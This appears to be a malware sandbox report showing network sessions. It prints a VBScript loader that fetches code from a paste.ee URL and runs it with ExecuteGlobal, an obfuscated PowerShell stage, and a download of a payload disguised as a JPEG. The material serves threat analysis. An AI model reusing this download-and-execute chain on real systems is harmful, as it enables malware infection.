00 6e 00 20 00 73 00 6f 00 6c 00 65 00 6e 00 6f 00 64 00 6f 00 6e 00 74 00 65 00 28 00 72 00 6f 00 6e 00 63 00 6f 00 6c 00 68 00 6f 00 29 00 0d 00 0a 00 45 00 78 00 65 00 63 00 75 00 74 00 65 00 47 00 6c 00 6f 00 62 00 61 00 6c 00 20 00 72 00 6f 00 6e 00 63 00 6f 00 6c 00 68 00 6f 00 0d 00 0a 00 45 00 6e 00 64 00 20 00 46 00 75 00 6e 00 63 00 74 00 69 00 6f 00 6e 00 Data Ascii: tapiriba = (Int((africanista-galacrista+1)*Rnd+galacrista))Set inquilinar = CreateObject("WinHttp.WinHttpRequest.5.1")inquilinar.Open "GET","http://paste.ee/d/kmRFs", Falseinquilinar.Sendarrebatador = inquilinar.ResponseTextsolenodonte arrebatadorFunction solenodonte(roncolho)ExecuteGlobal roncolhoEnd Function

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.22	49167	104.21.84.67	80	2096	C:\Windows\SysWOW64\wscript.exe

Timestamp	Bytes transferred	Direction	Data
Feb 13, 2024 15:08:02.440373898 CET	149	OUT	GET /d/kmRFs HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: paste.ee
Feb 13, 2024 15:08:02.652829885 CET	782	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 13 Feb 2024 14:08:02 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Location: https://paste.ee/d/kmRFs CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tzG3IsPMZJP4JBWdXGV4eUHOyYVm8L2grmjMsR5pQ4OY354EpzjIbsjOwaJgJlAr3vVYEpk6GpijZjHtk6I6lRQuswyFd%2Figkzju5Lzy3Se9aQ2KjY2tOvp0qA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 854da41f9f9e675d-ATL alt-svc: h3=":443"; ma=86400 Data Raw: 61 62 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a Data Ascii: ab<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
Feb 13, 2024 15:08:02.652853012 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.22	49168	104.21.84.67	443	2096	C:\Windows\SysWOW64\wscript.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-13 14:08:03 UTC	149	OUT	GET /d/kmRFs HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: paste.ee
2024-02-13 14:08:03 UTC	1236	IN	HTTP/1.1 200 OK Date: Tue, 13 Feb 2024 14:08:03 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close Cache-Control: max-age=2592000 strict-transport-security: max-age=63072000 x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1; mode=block content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none' CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=v15g7LwENY41lbzgNwhOJcGnYFwgDvDzTFsf2kMAVr17VNvEkVTZjfhBlT1oeSIVLt87aINMUlzpKUIbIKkKeBcq%2F01P4aVwE%2Bb7msQ7bm0uM3%2BBFEA%2BnEOP1w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 854da423fddf53b5-ATL alt-svc: h3=":443"; ma=86400
2024-02-13 14:08:03 UTC	133	IN	Data Raw: 31 66 37 66 0d 0a 0d 0a 20 20 20 20 20 64 69 6d 20 61 6d 65 74 61 6d 6f 72 70 68 6f 73 65 20 2c 20 64 79 6e 61 6d 6f 6d 65 74 72 69 61 20 2c 20 65 73 70 6c 65 6e 64 69 64 65 7a 20 2c 20 63 68 61 6c 72 65 69 6f 20 2c 20 73 6f 62 72 65 76 69 76 6f 20 2c 20 43 61 6d 61 20 2c 20 73 6f 62 72 65 76 69 76 6f 31 0d 0a 20 20 20 20 20 64 79 6e 61 6d 6f 6d 65 74 72 69 61 20 3d 20 22 20 20 22 0d 0a 20 20 20 Data Ascii: 1f7f dim ametamorphose , dynamometria , esplendidez , chalreio , sobrevivo , Cama , sobrevivo1 dynamometria = " "
2024-02-13 14:08:03 UTC	1369	IN	Data Raw: 20 20 65 73 70 6c 65 6e 64 69 64 65 7a 20 20 3d 20 22 22 20 26 20 63 68 61 6c 72 65 69 6f 20 26 20 64 79 6e 61 6d 6f 6d 65 74 72 69 61 20 26 20 63 68 61 6c 72 65 69 6f 20 26 20 22 67 42 31 44 67 54 72 65 47 34 44 67 54 72 65 59 77 42 30 44 67 54 72 65 47 6b 44 67 54 72 65 62 77 42 75 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 52 44 67 54 72 65 42 76 44 67 54 72 65 48 63 44 67 54 72 65 62 67 42 73 44 67 54 72 65 47 38 44 67 54 72 65 59 51 42 6b 44 67 54 72 65 45 51 44 67 54 72 65 59 51 42 30 44 67 54 72 65 47 45 44 67 54 72 65 52 67 42 79 44 67 54 72 65 47 38 44 67 54 72 65 62 51 42 4d 44 67 54 72 65 47 6b 44 67 54 72 65 62 67 42 72 44 67 54 72 65 48 4d 44 67 54 72 65 49 44 67 54 72 65 42 37 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 63 44 67 54 Data Ascii: esplendidez = "" & chalreio & dynamometria & chalreio & "gB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgT
2024-02-13 14:08:03 UTC	1369	IN	Data Raw: 54 72 65 48 4d 44 67 54 72 65 4c 67 42 4d 44 67 54 72 65 47 55 44 67 54 72 65 62 67 42 6e 44 67 54 72 65 48 51 44 67 54 72 65 61 44 67 54 72 65 44 67 54 72 65 37 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 22 20 26 20 63 68 61 6c 72 65 69 6f 20 26 20 64 79 6e 61 6d 6f 6d 65 74 72 69 61 20 26 20 63 68 61 6c 72 65 69 6f 20 26 20 22 67 42 76 44 67 54 72 65 48 49 44 67 54 72 65 22 20 26 20 63 68 61 6c 72 65 69 6f 20 26 20 64 79 6e 61 6d 6f 6d 65 74 72 69 61 20 26 20 63 68 61 6c 72 65 69 6f 20 26 20 22 51 42 68 44 67 54 72 65 47 4d 44 67 54 72 65 61 44 67 54 72 65 44 67 54 72 65 67 44 67 54 72 65 43 67 44 67 54 72 65 4a 44 67 54 72 65 42 73 44 67 54 72 65 47 6b 44 67 54 72 65 62 67 42 72 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 61 51 42 75 44 67 54 Data Ascii: TreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTre" & chalreio & dynamometria & chalreio & "gBvDgTreHIDgTre" & chalreio & dynamometria & chalreio & "QBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgT
2024-02-13 14:08:03 UTC	1369	IN	Data Raw: 72 65 4d 44 67 54 72 65 44 67 54 72 65 30 44 67 54 72 65 43 38 44 67 54 72 65 4e 77 44 67 54 72 65 7a 44 67 54 72 65 44 67 44 67 54 72 65 4c 77 44 67 54 72 65 35 44 67 54 72 65 44 6b 44 67 54 72 65 4e 44 67 54 72 65 44 67 54 72 65 76 44 67 54 72 65 47 38 44 67 54 72 65 63 67 42 70 44 67 54 72 65 47 63 44 67 54 72 65 61 51 42 75 44 67 54 72 65 47 45 44 67 54 72 65 62 44 67 54 72 65 44 67 54 72 65 76 44 67 54 72 65 47 34 44 67 54 72 65 22 20 26 20 63 68 61 6c 72 65 69 6f 20 26 20 64 79 6e 61 6d 6f 6d 65 74 72 69 61 20 26 20 63 68 61 6c 72 65 69 6f 20 26 20 22 51 42 33 44 67 54 72 65 46 38 44 67 54 72 65 61 51 42 74 44 67 54 72 65 47 45 44 67 54 72 65 22 20 26 20 63 68 61 6c 72 65 69 6f 20 26 20 64 79 6e 61 6d 6f 6d 65 74 72 69 61 20 26 20 63 68 61 6c 72 65 Data Ascii: reMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDgDgTreLwDgTre5DgTreDkDgTreNDgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTre" & chalreio & dynamometria & chalreio & "QB3DgTreF8DgTreaQBtDgTreGEDgTre" & chalreio & dynamometria & chalre
2024-02-13 14:08:03 UTC	1369	IN	Data Raw: 54 72 65 47 73 44 67 54 72 65 63 77 44 67 54 72 65 37 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 61 51 42 6d 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4b 44 67 54 72 65 44 67 54 72 65 6b 44 67 54 72 65 47 6b 44 67 54 72 65 62 51 42 68 44 67 54 72 65 47 63 44 67 54 72 65 22 20 26 20 63 68 61 6c 72 65 69 6f 20 26 20 64 79 6e 61 6d 6f 6d 65 74 72 69 61 20 26 20 63 68 61 6c 72 65 69 6f 20 26 20 22 51 42 43 44 67 54 72 65 48 6b 44 67 54 72 65 64 44 67 54 72 65 42 6c 44 67 54 72 65 48 4d 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 74 44 67 54 72 65 47 34 44 67 54 72 65 22 20 26 20 63 68 61 6c 72 65 69 6f 20 26 20 64 79 6e 61 6d 6f 6d 65 74 72 69 61 20 26 20 63 68 61 6c 72 65 69 6f 20 26 20 22 51 44 67 54 72 65 67 44 67 54 72 65 43 51 44 67 54 72 Data Ascii: TreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTre" & chalreio & dynamometria & chalreio & "QBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTre" & chalreio & dynamometria & chalreio & "QDgTregDgTreCQDgTr
2024-02-13 14:08:03 UTC	1369	IN	Data Raw: 73 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 6b 44 67 54 72 65 48 4d 44 67 54 72 65 64 44 67 54 72 65 42 68 44 67 54 72 65 48 49 44 67 54 72 65 64 44 67 54 72 65 42 4a 44 67 54 72 65 47 34 44 67 54 72 65 22 20 26 20 63 68 61 6c 72 65 69 6f 20 26 20 64 79 6e 61 6d 6f 6d 65 74 72 69 61 20 26 20 63 68 61 6c 72 65 69 6f 20 26 20 22 44 67 54 72 65 42 6c 44 67 54 72 65 48 67 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 39 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 44 67 54 72 65 42 70 44 67 54 72 65 47 30 44 67 54 72 65 59 51 42 6e 44 67 54 72 65 47 55 44 67 54 72 65 56 44 67 54 72 65 42 6c 44 67 54 72 65 48 67 44 67 54 72 65 64 44 67 54 72 65 44 67 54 72 65 75 44 67 54 72 65 45 6b 44 67 54 72 65 62 67 42 6b 44 67 54 72 65 47 55 44 67 54 72 65 Data Ascii: sDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTre" & chalreio & dynamometria & chalreio & "DgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTre
2024-02-13 14:08:03 UTC	1093	IN	Data Raw: 4a 44 67 54 72 65 47 34 44 67 54 72 65 22 20 26 20 63 68 61 6c 72 65 69 6f 20 26 20 64 79 6e 61 6d 6f 6d 65 74 72 69 61 20 26 20 63 68 61 6c 72 65 69 6f 20 26 20 22 44 67 54 72 65 42 6c 44 67 54 72 65 48 67 44 67 54 72 65 4b 51 44 67 54 72 65 67 44 67 54 72 65 48 73 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 6b 44 67 54 72 65 48 4d 44 67 54 72 65 64 44 67 54 72 65 42 68 44 67 54 72 65 48 49 44 67 54 72 65 64 44 67 54 72 65 42 4a 44 67 54 72 65 47 34 44 67 54 72 65 22 20 26 20 63 68 61 6c 72 65 69 6f 20 26 20 64 79 6e 61 6d 6f 6d 65 74 72 69 61 20 26 20 63 68 61 6c 72 65 69 6f 20 26 20 22 44 67 54 72 65 42 6c 44 67 54 72 65 48 67 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 72 44 67 54 72 65 44 30 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 6b Data Ascii: JDgTreG4DgTre" & chalreio & dynamometria & chalreio & "DgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTre" & chalreio & dynamometria & chalreio & "DgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrek
2024-02-13 14:08:03 UTC	1369	IN	Data Raw: 31 33 62 31 0d 0a 4d 44 67 54 72 65 64 44 67 54 72 65 42 79 44 67 54 72 65 47 6b 44 67 54 72 65 62 67 42 6e 44 67 54 72 65 43 67 44 67 54 72 65 4a 44 67 54 72 65 42 7a 44 67 54 72 65 48 51 44 67 54 72 65 59 51 42 79 44 67 54 72 65 48 51 44 67 54 72 65 53 51 42 75 44 67 54 72 65 47 51 44 67 54 72 65 22 20 26 20 63 68 61 6c 72 65 69 6f 20 26 20 64 79 6e 61 6d 6f 6d 65 74 72 69 61 20 26 20 63 68 61 6c 72 65 69 6f 20 26 20 22 51 42 34 44 67 54 72 65 43 77 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 6b 44 67 54 72 65 47 49 44 67 54 72 65 59 51 42 7a 44 67 54 72 65 47 55 44 67 54 72 65 4e 67 44 67 54 72 65 30 44 67 54 72 65 45 77 44 67 54 72 65 22 20 26 20 63 68 61 6c 72 65 69 6f 20 26 20 64 79 6e 61 6d 6f 6d 65 74 72 69 61 20 26 20 63 68 61 6c 72 65 69 6f Data Ascii: 13b1MDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTre" & chalreio & dynamometria & chalreio & "QB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTre" & chalreio & dynamometria & chalreio
2024-02-13 14:08:03 UTC	1369	IN	Data Raw: 65 51 42 30 44 67 54 72 65 47 55 44 67 54 72 65 63 77 44 67 54 72 65 70 44 67 54 72 65 44 73 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 6b 44 67 54 72 65 48 51 44 67 54 72 65 65 51 42 77 44 67 54 72 65 47 55 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 39 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 44 67 54 72 65 42 73 44 67 54 72 65 47 38 44 67 54 72 65 59 51 42 6b 44 67 54 72 65 47 55 44 67 54 72 65 22 20 26 20 63 68 61 6c 72 65 69 6f 20 26 20 64 79 6e 61 6d 6f 6d 65 74 72 69 61 20 26 20 63 68 61 6c 72 65 69 6f 20 26 20 22 44 67 54 72 65 42 42 44 67 54 72 65 48 4d 44 67 54 72 65 63 77 42 6c 44 67 54 72 65 47 30 44 67 54 72 65 59 67 42 73 44 67 54 72 65 48 6b 44 67 54 72 65 4c 67 42 48 44 67 54 72 65 47 55 44 67 54 72 65 64 44 67 54 72 65 Data Ascii: eQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTre" & chalreio & dynamometria & chalreio & "DgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTre
2024-02-13 14:08:03 UTC	1369	IN	Data Raw: 6d 6f 6d 65 74 72 69 61 20 26 20 63 68 61 6c 72 65 69 6f 20 26 20 22 77 42 42 44 67 54 72 65 48 4d 44 67 54 72 65 62 51 44 67 54 72 65 6e 44 67 54 72 65 43 77 44 67 54 72 65 4a 77 44 67 54 72 65 6e 44 67 54 72 65 43 6b 44 67 54 72 65 4b 51 42 39 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 66 51 44 67 54 72 65 3d 22 0d 0a 20 20 20 20 20 65 73 70 6c 65 6e 64 69 64 65 7a 20 3d 20 52 65 70 6c 61 63 65 28 20 65 73 70 6c 65 6e 64 69 64 65 7a 2c 20 63 68 61 6c 72 65 69 6f 20 2b 20 64 79 6e 61 6d 6f 6d 65 74 72 69 61 20 2b 20 63 68 61 6c 72 65 69 6f 20 2c 20 22 5a 22 29 0d 0a 20 20 20 20 20 53 65 74 20 43 61 6d 61 20 3d 20 57 53 63 72 69 70 74 2e 43 72 65 61 74 65 4f 62 6a 65 63 74 28 22 57 53 63 72 69 70 74 2e 53 68 65 6c 6c 22 29 0d 0a 20 20 20 20 20 61 6d Data Ascii: mometria & chalreio & "wBBDgTreHMDgTrebQDgTrenDgTreCwDgTreJwDgTrenDgTreCkDgTreKQB9DgTreCDgTreDgTrefQDgTre=" esplendidez = Replace( esplendidez, chalreio + dynamometria + chalreio , "Z") Set Cama = WScript.CreateObject("WScript.Shell") am

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.22	49169	172.67.215.45	443	1700	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-13 14:08:05 UTC	136	OUT	GET /images/004/738/994/original/new_image_vbs_updated.jpg?1707769907 HTTP/1.1 Host: uploaddeimagens.com.br Connection: Keep-Alive
2024-02-13 14:08:05 UTC	688	IN	HTTP/1.1 200 OK Date: Tue, 13 Feb 2024 14:08:05 GMT Content-Type: image/jpeg Content-Length: 8369614 Connection: close Last-Modified: Mon, 12 Feb 2024 20:31:47 GMT ETag: "65ca8033-7fb5ce" Cache-Control: max-age=2678400 CF-Cache-Status: REVALIDATED Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4PImsf2a6fc7R3wd472mFdZQvB79vDeXiPcIpv4LhaM4unHLMiccb1O4VgtSEFkn6vzG7tvvz4pZqvexeKLlho3qENFvEEnvxy6QefYBd3dO%2FXavLn00R75DhfuHY3fUTAeYfjYanVNb"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 854da4325d7844eb-ATL alt-svc: h3=":443"; ma=86400
2024-02-13 14:08:05 UTC	681	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff fe 00 3b 43 52 45 41 54 4f 52 3a 20 67 64 2d 6a 70 65 67 20 76 31 2e 30 20 28 75 73 69 6e 67 20 49 4a 47 20 4a 50 45 47 20 76 36 32 29 2c 20 71 75 61 6c 69 74 79 20 3d 20 39 35 0a ff db 00 43 00 03 02 02 03 02 02 03 03 03 03 04 03 03 04 05 08 05 05 04 04 05 0a 07 07 06 08 0c 0a 0c 0c 0b 0a 0b 0b 0d 0e 12 10 0d 0e 11 0e 0b 0b 10 16 10 11 13 14 15 15 15 0c 0f 17 18 16 14 18 12 14 15 14 ff db 00 43 01 03 04 04 05 04 05 09 05 05 09 14 0d 0b 0d 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 ff c0 00 11 08 08 70 0f 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 Data Ascii: JFIF;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 95CCp"
2024-02-13 14:08:05 UTC	1369	IN	Data Raw: 00 3f 00 ec 41 f5 38 14 9b 87 b9 a8 d9 fd f0 29 0b 64 72 4d 7e cf 63 f2 24 bb 92 97 18 e3 83 4c dd 8f ad 33 70 02 90 9a 18 58 90 b1 f5 14 c2 de 99 35 1e ff 00 41 48 ce 7d 7f 2a 2c 57 a0 f2 7d e9 15 88 61 c8 e3 bd 47 bb 3d e9 a1 8e 70 39 a2 c2 d4 99 f0 5b 23 a7 a5 46 7a f5 e3 d2 9a 5b 07 1d 0d 37 7f bd 26 86 3f 75 37 34 9b 85 34 b6 09 e7 22 98 27 7d 81 8f 4e 73 4d 0d c8 19 f7 a0 91 d4 d2 6d 04 f4 a2 e6 97 1c ed 8f ad 30 b7 eb 41 fa e6 9a 7d 28 b8 58 70 6e 3d 68 ce 7d aa 3a 46 7e 28 b8 0f 63 c9 15 19 3e f4 c6 6e 7d e9 03 64 fb d2 b8 c9 0b 63 f9 53 1b bf 3f 85 21 6e 47 a5 04 e4 e7 b5 17 1a 42 83 8f a5 21 7c 1a 42 c7 1d a9 84 93 45 c6 d0 e2 f9 f6 a6 96 18 e0 e6 9a cd e9 4d 0e 57 b7 e9 45 c9 6b b0 f6 6c 53 0b 1c f3 cd 21 6c f5 a6 1e 09 e7 8a 68 12 b1 26 73 da Data Ascii: ?A8)drM~c$L3pX5AH}*,W}aG=p9[#Fz[7&?u744"'}NsMm0A}(Xpn=h}:F~(c>n}dcS?!nGB!\|BEMWEklS!lh&s
2024-02-13 14:08:05 UTC	1369	IN	Data Raw: 2b 2b 28 f4 c4 86 fa 19 64 79 b5 01 21 2d 70 ad ca a1 5e 83 6f 62 09 f7 15 9d cf a1 fc 7a d6 62 71 ec 26 05 06 3e 33 83 4e 0a 4f 63 52 2a 67 b5 26 c5 62 df 87 f5 eb ff 00 0b df b5 ee 9b 2a c3 72 d1 34 05 99 43 fc 8c 06 ec 02 31 9e 01 cf b5 66 95 2d b9 9d 89 76 c9 24 e4 e4 9e 4f 3f 8f 5a 98 a6 3d 40 f6 a8 8f b7 34 79 96 97 46 47 b7 04 f6 1f af 7c 51 c5 38 02 73 9e 0d 33 69 ce 33 c7 bd 03 4a c3 1b 07 38 38 a6 b4 65 71 90 09 eb ef 53 2e 41 0c 40 38 e6 96 66 32 be ec 63 da 8b 85 ae 56 da 73 e9 df 14 85 3b e2 a4 27 9a 4a 41 62 17 18 14 8a bb fb e3 eb 52 95 19 f6 a8 dd 70 38 eb 4c 08 c8 db df 34 94 1c e7 9a 2a 86 26 71 d3 ad 0c c7 6e 33 c1 e4 d2 d0 29 58 07 da dd 4f 63 3a 4f 6d 2c 90 4c 87 2b 24 67 0c 38 ec 7a f2 0e 0d 46 d9 6c b3 12 4b 72 7b f3 df 27 af 3d 79 Data Ascii: ++(dy!-p^obzbq&>3NOcRg&br4C1f-v$O?Z=@4yFG\|Q8s3i3J88eqS.A@8f2cVs;'JAbRp8L4*&qn3)XOc:Om,L+$g8zFlKr{'=y
2024-02-13 14:08:05 UTC	1369	IN	Data Raw: b4 a1 4b 90 14 12 49 c0 c7 52 69 a7 70 dc 55 23 6d 31 7a e3 34 e9 a0 92 dd ca c8 85 18 73 82 30 79 e9 4c 0b 43 18 f3 c1 f5 a4 a0 f5 a2 a4 41 49 b7 18 a5 a2 90 00 ef f9 51 49 d0 9f 7e 69 73 52 02 30 c8 3e bd 7f 2a 61 07 07 db fc e6 9e 58 7a fb 53 c2 c4 62 72 ce 44 a3 01 40 03 1f 42 73 4d 30 20 28 47 b5 30 8c 75 a9 58 9c 8e 73 4d 35 77 1a d4 4c 71 48 46 29 d4 52 34 1b f8 52 53 99 71 4d a0 06 49 c7 6c 8a 68 19 20 74 cd 48 c3 22 a3 c6 08 3d e9 dc 63 a4 8d a3 23 3d f0 7f 0a 6d 39 9c be 37 12 69 b4 30 b0 51 45 15 24 b4 27 bd 2f 07 a5 14 54 8a c0 e0 29 c0 39 03 bf 6f 53 52 4b 6f 24 0b 13 49 1b 22 ca bb a3 66 e0 32 e7 a8 a8 f1 c8 ed fa d3 9e 59 24 08 1d d9 c2 0d aa 09 c8 51 9c f0 3b 50 2d 86 d0 14 91 9c 71 eb 45 00 9c 11 9e 0d 00 35 8f 4a 4a 07 26 8a a5 d8 62 1e Data Ascii: KIRipU#m1z4s0yLCAIQI~isR0>*aXzSbrD@BsM0 (G0uXsM5wLqHF)R4RSqMIlh tH"=c#=m97i0QE$'/T)9oSRKo$I"f2Y$Q;P-qE5JJ&b
2024-02-13 14:08:05 UTC	1369	IN	Data Raw: 3e d4 84 60 f2 30 7d e9 41 28 41 07 04 50 cc 5c 92 4e 4f 73 4c 76 13 1c 83 e9 4b d6 8e b4 01 9a 4c 96 14 51 40 19 a9 00 a5 e8 69 08 c5 28 c7 7a 00 3a 9f 53 fa d2 93 c7 4a 6d 14 00 53 4f 26 9e 46 06 73 51 f7 eb c5 3b 00 ee bc 54 67 8c f7 a9 8a 32 a0 62 08 0d 9c 66 a3 23 26 90 d0 32 6c 08 72 09 3d 87 6f ad 34 1c 0e 94 b8 c7 7a 36 d0 31 68 a5 03 34 63 9a 00 4c d2 e3 8f 7a 30 70 69 3f 43 eb 40 0a 41 53 cf 06 92 9d 92 ed c9 c9 e0 52 50 02 52 d2 51 40 0a 4e 4d 25 14 50 01 4b d8 d1 8c f6 cd 27 f5 a0 03 a7 b5 3c c8 cd 08 43 ca 83 9c fb 9e c4 d3 29 db c8 52 a0 e0 1e 71 40 00 20 0c 52 d2 75 1d 29 b4 0a c4 d0 95 66 e7 81 44 98 0e 76 fd d3 fa 54 43 fc e2 94 37 18 ed 4b 51 13 5a dd 4b 65 73 15 c4 0e 63 9e 26 0e 92 0e a0 8e 46 3e 86 8b ab 99 6f 6e 65 b8 99 cc 93 4c e6 Data Ascii: >`0}A(AP\NOsLvKLQ@i(z:SJmSO&FsQ;Tg2bf#&2lr=o4z61h4cLz0pi?C@ASRPRQ@NM%PK'<C)Rq@ Ru)fDvTC7KQZKesc&F>oneL
2024-02-13 14:08:05 UTC	1369	IN	Data Raw: e9 59 f2 95 cd a6 84 06 20 dd f8 ab 1a 7d c5 ad a3 ce 6e 6c c5 e0 78 99 50 16 c6 c7 ec c3 e9 e9 4c fb a6 a2 6e fc 71 52 e3 7d 0a 8c fb 95 59 0a e3 27 24 67 9f 6c f4 fc 29 09 dc 0f 3c 54 ae be b5 11 e3 e9 43 89 5c c4 64 1c 54 4c 4e 7d fd aa 7e 49 03 af f2 a6 32 64 e4 71 df 1d 0d 67 cb 62 ae 44 ec 64 cb 1e 4f 1f 87 61 51 b8 c9 03 03 03 8c fa fe 95 af a2 59 e9 57 97 12 c7 ab de cf 61 07 94 4c 72 43 0f 9b 96 03 20 11 91 d4 f7 1f 8d 64 90 4e 33 d4 fb e6 96 fa 58 3a 27 71 98 23 34 d6 e7 f0 a9 48 e6 98 47 07 d6 97 2d f5 05 2b 11 18 9b 1b f1 f2 8e fd b9 f4 a7 45 75 3d ba 4f 1c 52 c9 1c 73 28 49 55 18 81 20 c8 60 08 cf 62 a0 e3 da 9c 77 79 7b 4b 1c 75 c7 6a 41 19 72 06 ec 13 c6 71 ef 59 b5 dc d6 32 b1 58 a8 07 39 cf e1 8a 42 39 ab 37 11 04 90 85 7d e3 d6 a1 f2 c8 Data Ascii: Y }nlxPLnqR}Y'$gl)<TC\dTLN}~I2dqgbDdOaQYWaLrC dN3X:'q#4HG-+Eu=ORs(IU `bwy{KujArqY2X9B97}
